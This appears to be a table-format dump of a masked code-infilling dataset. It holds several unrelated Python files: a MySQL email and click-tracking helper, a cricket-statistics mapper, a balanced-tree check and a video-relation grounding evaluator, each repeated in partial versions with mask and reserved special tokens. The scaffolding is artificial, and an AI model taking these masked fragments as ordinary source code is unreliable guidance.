code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
import MySQLdb
from MySQLdb import escape_string as thwart
"""
"""
class DatabaseConnection:
def __init__(self, address, user, password, database):
self.address = address
self.user = user
self.password = password
self.database = database
"""
"""
def connect(self):
self.conn = MySQLdb.connect(host=self.address,
port=3306,
user=self.user,
passwd=self.password,
db=self.database)
c = self.conn.cursor()
return c, self.conn
def disconnect(self):
self.conn.close()
def addEmail(self, email, number):
try:
c, conn = self.connect()
c.execute("INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)", (thwart(email), thwart(number),))
conn.commit()
self.disconnect()
return True
except Exception:
return False
def removeEmail(self, email):
try:
c, conn = self.connect()
c.execute("DELETE from User WHERE email = (%s)", (thwart(email),))
conn.commit()
self.disconnect()
return True
except Exception:
return False
def updateSpamTable(self, mailID, repo):
try:
c, conn = self.connect()
no = c.execute("SELECT * FROM spammail WHERE idEmail = %s", (thwart(mailID),))
print(no)
if no == 0:
c.execute("INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)", (1, thwart(repo), thwart(mailID),))
else:
c.execute("SELECT numClicked FROM spammail WHERE idEmail = %s", (thwart(mailID),))
no = c.fetchone()[0]
print(no)
c.execute("UPDATE spammail SET numClicked = %s WHERE idEmail = %s", (no+1, thwart(mailID),))
conn.commit()
self.disconnect()
print("here")
return True
except:
return False
def getMostClicked(self):
try:
c, conn = self.connect()
c.execute("SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1")
data = c.fetchone()
print(data)
self.disconnect()
return [data[0], data[1], data[2]]
except:
return []
|
normal
|
{
"blob_id": "c6502d6b589fa75dfbd5946a1097e77fc0b472c4",
"index": 1126,
"step-1": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n <mask token>\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-3": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute('SELECT * FROM spammail WHERE idEmail = %s', (\n thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\n 'INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)'\n , (1, thwart(repo), thwart(mailID)))\n else:\n c.execute('SELECT numClicked FROM spammail WHERE idEmail = %s',\n (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\n 'UPDATE spammail SET numClicked = %s WHERE idEmail = %s',\n (no + 1, thwart(mailID)))\n conn.commit()\n self.disconnect()\n print('here')\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-4": "<mask token>\n\n\nclass DatabaseConnection:\n\n def __init__(self, address, user, password, database):\n self.address = address\n self.user = user\n self.password = password\n self.database = database\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute('SELECT * FROM spammail WHERE idEmail = %s', (\n thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\n 'INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)'\n , (1, thwart(repo), thwart(mailID)))\n else:\n c.execute('SELECT numClicked FROM spammail WHERE idEmail = %s',\n (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\n 'UPDATE spammail SET numClicked = %s WHERE idEmail = %s',\n (no + 1, thwart(mailID)))\n conn.commit()\n self.disconnect()\n print('here')\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-5": "import MySQLdb\nfrom MySQLdb import escape_string as thwart\n\"\"\"\n\"\"\"\nclass DatabaseConnection:\n\n def __init__(self, address, user, password, database):\n self.address = address\n self.user = user\n self.password = password\n self.database = database\n\n \"\"\"\n \n \"\"\"\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address,\n port=3306,\n user=self.user,\n passwd=self.password,\n db=self.database)\n\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\"INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)\", (thwart(email), thwart(number),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute(\"DELETE from User WHERE email = (%s)\", (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute(\"SELECT * FROM spammail WHERE idEmail = %s\", (thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\"INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)\", (1, thwart(repo), thwart(mailID),))\n else:\n c.execute(\"SELECT numClicked FROM spammail WHERE idEmail = %s\", (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\"UPDATE spammail SET numClicked = %s WHERE idEmail = %s\", (no+1, thwart(mailID),))\n\n conn.commit()\n self.disconnect()\n print(\"here\")\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\"SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1\")\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n\n",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for line in infile:
line = line.strip()
my_list = line.split(',')
if my_list[0] != 'ball':
continue
batsman = my_list[4]
bowler = my_list[6]
if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
] == 'retired hurt':
dismissed = '0'
else:
dismissed = '1'
print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
infile = sys.stdin
for line in infile:
line = line.strip()
my_list = line.split(',')
if my_list[0] != 'ball':
continue
batsman = my_list[4]
bowler = my_list[6]
if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
] == 'retired hurt':
dismissed = '0'
else:
dismissed = '1'
print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
import sys
import csv
infile = sys.stdin
for line in infile:
line = line.strip()
my_list = line.split(',')
if my_list[0] != 'ball':
continue
batsman = my_list[4]
bowler = my_list[6]
if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
] == 'retired hurt':
dismissed = '0'
else:
dismissed = '1'
print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
#!/usr/bin/python3
import sys
import csv
infile = sys.stdin
for line in infile:
line = line.strip()
my_list = line.split(',')
if my_list[0] != "ball":
continue
batsman = my_list[4]
bowler = my_list[6]
if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9] == "retired hurt":
dismissed = '0'
else:
dismissed = '1'
print('%s,%s\t%s\t%s' % (batsman,bowler,dismissed,'1'))
|
flexible
|
{
"blob_id": "cfa7dc295c635bbdf707f1e899c4fbf8ea91df9a",
"index": 1209,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-3": "<mask token>\ninfile = sys.stdin\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-4": "import sys\nimport csv\ninfile = sys.stdin\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-5": "#!/usr/bin/python3\nimport sys\nimport csv\ninfile = sys.stdin\n\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != \"ball\":\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9] == \"retired hurt\":\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman,bowler,dismissed,'1')) \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def is_balanced(tree_root):
# Determine if the tree is superbalanced
if tree_root is None:
return True
nodeQ = [(tree_root, 0)]
depths = []
while len(nodeQ):
last_node, depth = nodeQ.pop()
if( not last_node.left ) and (not last_node.right ):
if depth not in depths:
depths.append(depth)
if ((len(depths) > 1) and (max(depths) - min(depths) > 1)):
return False
else:
if(last_node.left):
nodeQ.append((last_node.left, depth + 1))
if(last_node.right):
nodeQ.append((last_node.right, depth + 1))
return True
# store node pointer and depth as tuples
# pop together and store in variables node, depth
# append node.right, node.left
# put in while loop until list is empty
|
normal
|
{
"blob_id": "833c8234d829dfa1937392f0ad4952aeffa4e26d",
"index": 1150,
"step-1": "<mask token>\n",
"step-2": "def is_balanced(tree_root):\n if tree_root is None:\n return True\n nodeQ = [(tree_root, 0)]\n depths = []\n while len(nodeQ):\n last_node, depth = nodeQ.pop()\n if not last_node.left and not last_node.right:\n if depth not in depths:\n depths.append(depth)\n if len(depths) > 1 and max(depths) - min(depths) > 1:\n return False\n else:\n if last_node.left:\n nodeQ.append((last_node.left, depth + 1))\n if last_node.right:\n nodeQ.append((last_node.right, depth + 1))\n return True\n",
"step-3": "def is_balanced(tree_root):\n # Determine if the tree is superbalanced\n \n if tree_root is None:\n return True\n \n nodeQ = [(tree_root, 0)]\n depths = []\n \n while len(nodeQ):\n \n last_node, depth = nodeQ.pop()\n \n if( not last_node.left ) and (not last_node.right ):\n if depth not in depths:\n depths.append(depth)\n \n if ((len(depths) > 1) and (max(depths) - min(depths) > 1)):\n return False\n else:\n \n if(last_node.left):\n nodeQ.append((last_node.left, depth + 1))\n if(last_node.right):\n nodeQ.append((last_node.right, depth + 1))\n \n return True\n \n \n# store node pointer and depth as tuples\n# pop together and store in variables node, depth\n# append node.right, node.left\n# put in while loop until list is empty\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os.path as osp
from evaluations.common import tiou
from evaluations.util import load_file
import generate_track_link
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os.path as osp
from evaluations.common import tiou
from evaluations.util import load_file
import generate_track_link
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
# pred_relations = sorted(pred_relations, key=lambda x: x['score'], reverse=True)
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
# print(relation)
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub /relation_num
predict_obj = predict_obj /relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = eval_ground_scores(relation_gt, relation_pred, tiou_threshold)
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print("Acc_S\t Acc_O\t Acc_R")
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub*100, acc_obj*100, acc*100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "f26e6164fc4c07fd3339171e316b3a1f7a4be669",
"index": 2447,
"step-1": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef eval_ground_scores(gt_relations, pred_relations, tiou_threshold):\n \"\"\"\n\n :param gt_relations:\n :param pred_relations:\n :param tiou_threshold:\n :return:\n \"\"\"\n relation_num = len(gt_relations)\n predict, predict_sub, predict_obj = 0, 0, 0\n for relation, pred_trajs in pred_relations.items():\n pred_sub = pred_trajs['sub']\n pred_obj = pred_trajs['obj']\n flag, flag_s, flag_o = False, False, False\n gt_trajs = gt_relations[relation]\n for gt_traj in gt_trajs:\n gt_sub = gt_traj['sub']\n gt_obj = gt_traj['obj']\n s_tiou = tiou(pred_sub, gt_sub)\n o_tiou = tiou(pred_obj, gt_obj)\n r_iou = min(s_tiou, o_tiou)\n if r_iou >= tiou_threshold:\n flag = True\n if s_tiou >= tiou_threshold:\n flag_s = True\n if o_tiou >= tiou_threshold:\n flag_o = True\n if flag:\n predict += 1\n if flag_s:\n predict_sub += 1\n if flag_o:\n predict_obj += 1\n predict = predict / relation_num\n predict_sub = predict_sub / relation_num\n predict_obj = predict_obj / relation_num\n return predict, predict_sub, predict_obj, relation_num\n\n\ndef evaluate(groundtruth, prediction, tiou_threshold=0.5):\n \"\"\" evaluate visual relation detection and visual \n relation tagging.\n \"\"\"\n video_num = len(groundtruth)\n print('Computing grounding accuracy over {} videos...'.format(video_num))\n acc, acc_sub, acc_obj = 0.0, 0.0, 0.0\n gt_rnum = 0\n for qid, relation_gt in groundtruth.items():\n if qid not in prediction:\n continue\n relation_pred = prediction[qid]\n if len(relation_pred) == 0:\n continue\n video_acc, video_acc_sub, video_acc_obj, relation_num = (\n eval_ground_scores(relation_gt, relation_pred, tiou_threshold))\n acc += video_acc\n acc_sub += video_acc_sub\n acc_obj += video_acc_obj\n gt_rnum += relation_num\n acc /= video_num\n acc_sub /= video_num\n acc_obj /= video_num\n print('Acc_S\\t Acc_O\\t Acc_R')\n print('{:.2f}\\t {:.2f}\\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, \n acc * 100))\n\n\ndef main():\n groundtruth_dir = 'dataset/vidvrd/'\n gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')\n result_dir = 'results/'\n res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')\n if not osp.exists(res_file):\n print('Generating ...')\n 